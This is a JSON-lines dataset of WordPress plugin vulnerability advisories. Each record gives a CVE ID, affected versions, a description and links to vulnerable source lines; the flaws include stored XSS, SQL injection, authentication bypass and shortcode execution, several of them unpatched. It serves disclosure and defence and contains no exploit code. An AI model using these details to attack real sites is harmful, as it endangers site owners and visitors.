{"CVE_ID":"CVE-2024-6767","slug":"wordsurvey","versionImpact":"3.2","description":"The WordSurvey plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018sounding_title\u2019 parameter in all versions up to, and including, 3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/626dac34-6b25-42c9-8f7d-9899e4bcc039?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/626dac34-6b25-42c9-8f7d-9899e4bcc039?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordsurvey\\\/trunk\\\/wordsurvey-add.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordsurvey\\\/trunk\\\/wordsurvey-add.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wordsurvey\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wordsurvey\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8516","slug":"themesflat-addons-for-elementor","versionImpact":"2.2.1","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.1 via the render() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract limited post information from draft and future scheduled posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75c5d4e6-9ef3-4b12-9ee9-67121dbb0fcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75c5d4e6-9ef3-4b12-9ee9-67121dbb0fcd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-posts.php#L3327\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-posts.php#L3327\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10181","slug":"newsletters-lite","versionImpact":"4.9.9.4","description":"The Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's newsletters_video shortcode in all versions up to, and including, 4.9.9.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/915c46f9-a342-4cc6-a726-2f1581a5d481?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/915c46f9-a342-4cc6-a726-2f1581a5d481?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/newsletters-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/newsletters-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175816\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175816\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11038","slug":"wpb-popup-for-contact-form-7","versionImpact":"1.7.5","description":"The The WPB Popup for Contact Form 7 \u2013 Showing The Contact Form 7 Popup on Button Click \u2013 CF7 Popup plugin for WordPress is vulnerable to arbitrary shortcode execution via wpb_pcf_fire_contact_form AJAX action in all versions up to, and including, 1.7.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7faa800-3b29-4b79-8b94-1e7985acb50d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7faa800-3b29-4b79-8b94-1e7985acb50d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpb-popup-for-contact-form-7\\\/tags\\\/1.7.4\\\/includes\\\/class.ajax.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpb-popup-for-contact-form-7\\\/tags\\\/1.7.4\\\/includes\\\/class.ajax.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpb-popup-for-contact-form-7\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpb-popup-for-contact-form-7\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188864\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188864\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/gist.github.com\\\/wpbean\\\/1a5abfea883621b4e150eab1362a420f\",\"name\":\"https:\\\/\\\/gist.github.com\\\/wpbean\\\/1a5abfea883621b4e150eab1362a420f\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5541","slug":"runners-log","versionImpact":"3.9.2","description":"The Runners Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'runnerslog' shortcode in all versions up to, and including, 3.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/runners-log\\\/trunk\\\/runnerslog_chart.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/runners-log\\\/trunk\\\/runnerslog_chart.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca53aba-b7dd-4b78-b2ac-c69050308e94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca53aba-b7dd-4b78-b2ac-c69050308e94?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4784","slug":"hueman-addons","versionImpact":"2.3.3","description":"The Hueman Addons WordPress plugin through 2.3.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a30c6f1e-62fd-493d-ad5e-1b55ceec62a9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a30c6f1e-62fd-493d-ad5e-1b55ceec62a9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2027","slug":"zm-ajax-login-register","versionImpact":"2.0.2","description":"The ZM Ajax Login & Register plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.0.2. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zm-ajax-login-register\\\/trunk\\\/src\\\/ALRSocial\\\/ALRSocialFacebook.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zm-ajax-login-register\\\/trunk\\\/src\\\/ALRSocial\\\/ALRSocialFacebook.php#L58\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b10d01ec-54ef-456b-9410-ed013343a962?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b10d01ec-54ef-456b-9410-ed013343a962?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4378","slug":"wp-quick-front-end-editor","versionImpact":"5.5","description":"The WP Quick FrontEnd Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with minimal permissions like subscribers, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed137706-1313-4bff-882b-13d9fa11498c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed137706-1313-4bff-882b-13d9fa11498c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3063","slug":"sp-client-document-manager","versionImpact":"4.67","description":"The SP Project & Document Manager plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 4.67. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for authenticated attackers with subscriber privileges or above, to change user passwords and potentially take over administrator accounts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sp-client-document-manager\\\/trunk\\\/classes\\\/ajax.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sp-client-document-manager\\\/trunk\\\/classes\\\/ajax.php#L149\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc2e720-85d9-42d9-94ef-eb172425993d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc2e720-85d9-42d9-94ef-eb172425993d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0825","slug":"vimeography","versionImpact":"2.3.2","description":"The Vimeography: Vimeo Video Gallery WordPress Plugin plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.3.2 via deserialization of untrusted input via the vimeography_duplicate_gallery_serialized in the duplicate_gallery function. This makes it possible for authenticated attackers, with contributor access or higher, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/853516b2-ec50-4937-89d3-d16042a6f71c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/853516b2-ec50-4937-89d3-d16042a6f71c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vimeography\\\/trunk\\\/lib\\\/api\\\/galleries.php#L816\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vimeography\\\/trunk\\\/lib\\\/api\\\/galleries.php#L816\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2688","slug":"embedpress","versionImpact":"3.9.12","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the EmbedPress document widget in all versions up to, and including, 3.9.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5b67927-5993-4e21-af52-8ebe7fee48ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5b67927-5993-4e21-af52-8ebe7fee48ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5266","slug":"download-manager","versionImpact":"3.2.92","description":"The Download Manager Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via wpdm_user_dashboard, wpdm_package, wpdm_packages, wpdm_search_result, and wpdm_tag shortcodes in all versions up to, and including, 3.2.92 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e363a62-8d31-4140-878b-5034d6c7b6a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e363a62-8d31-4140-878b-5034d6c7b6a1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/wpdm-functions.php?rev=3052986#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/wpdm-functions.php?rev=3052986#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/wpdm-functions.php?rev=3052986#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/wpdm-functions.php?rev=3052986#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/User\\\/views\\\/dashboard\\\/profile.php?rev=2558306#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/User\\\/views\\\/dashboard\\\/profile.php?rev=2558306#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/User\\\/Dashboard.php?rev=2799791#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/User\\\/Dashboard.php?rev=2799791#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/User\\\/Dashboard.php?rev=2799791#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/User\\\/Dashboard.php?rev=2799791#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/link-templates\\\/link-template-bsthumnail.php?rev=2558306#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/link-templates\\\/link-template-bsthumnail.php?rev=2558306#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L255\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L337\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L337\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L315\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/Shortcodes.php?rev=3052986#L315\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_user_dashboard-user-dashboard-short-code\\\/\",\"name\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_user_dashboard-user-dashboard-short-code\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_package-single-package-embed-short-code\\\/\",\"name\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_package-single-package-embed-short-code\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_packages-wp_query-in-a-shortcode-for-download-manager-packages\\\/\",\"name\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_packages-wp_query-in-a-shortcode-for-download-manager-packages\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_search_result-shows-search-form\\\/\",\"name\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_search_result-shows-search-form\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_tag-query-all-downloads-from-specified-tags\\\/\",\"name\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_tag-query-all-downloads-from-specified-tags\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096450\\\/#file24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096450\\\/#file24\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8515","slug":"themesflat-addons-for-elementor","versionImpact":"2.2.1","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets like 'TF E Slider Widget', 'TF Video Widget', 'TF Team Widget' and more in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on URL attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1603c61b-11a3-41e5-b339-a9411b02f383?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1603c61b-11a3-41e5-b339-a9411b02f383?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-flex-slide.php#L2522\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-flex-slide.php#L2522\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-video.php#L318\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-video.php#L318\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-team.php#L1234\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-team.php#L1234\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-team.php#L1285\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-team.php#L1285\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-testimonial.js#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-testimonial.js#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-carousel.js#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-carousel.js#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-post.js#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-post.js#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-woo-product.js#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-woo-product.js#L42\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9051","slug":"wp-ultimate-post-grid","versionImpact":"3.9.3","description":"The WP Ultimate Post Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpupg-grid-with-filters shortcode in all versions up to, and including, 3.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3154a7a-b8b3-490b-9822-b3a92d1b4fef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3154a7a-b8b3-490b-9822-b3a92d1b4fef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-ultimate-post-grid\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-ultimate-post-grid\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-post-grid\\\/trunk\\\/includes\\\/public\\\/class-wpupg-shortcode.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-post-grid\\\/trunk\\\/includes\\\/public\\\/class-wpupg-shortcode.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-post-grid\\\/trunk\\\/includes\\\/public\\\/class-wpupg-blocks.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-post-grid\\\/trunk\\\/includes\\\/public\\\/class-wpupg-blocks.php#L142\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166429\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166429\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11036","slug":"gamipress","versionImpact":"7.1.5","description":"The The GamiPress \u2013 The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via gamipress_get_user_earnings AJAX action in all versions up to, and including, 7.1.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bad0cd3f-88ea-4a1d-b400-0a450b07a546?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bad0cd3f-88ea-4a1d-b400-0a450b07a546?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/tags\\\/7.1.4\\\/includes\\\/functions.php#L693\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/tags\\\/7.1.4\\\/includes\\\/functions.php#L693\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/tags\\\/7.1.4\\\/includes\\\/functions.php#L702\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/tags\\\/7.1.4\\\/includes\\\/functions.php#L702\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8679","slug":"library-management-system","versionImpact":"3.0.0","description":"The Library Management System \u2013 Manage e-Digital Books Library plugin for WordPress is vulnerable to SQL Injection via the 'value' parameter of the owt_lib_handler AJAX action in all versions up to, and including, 3.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 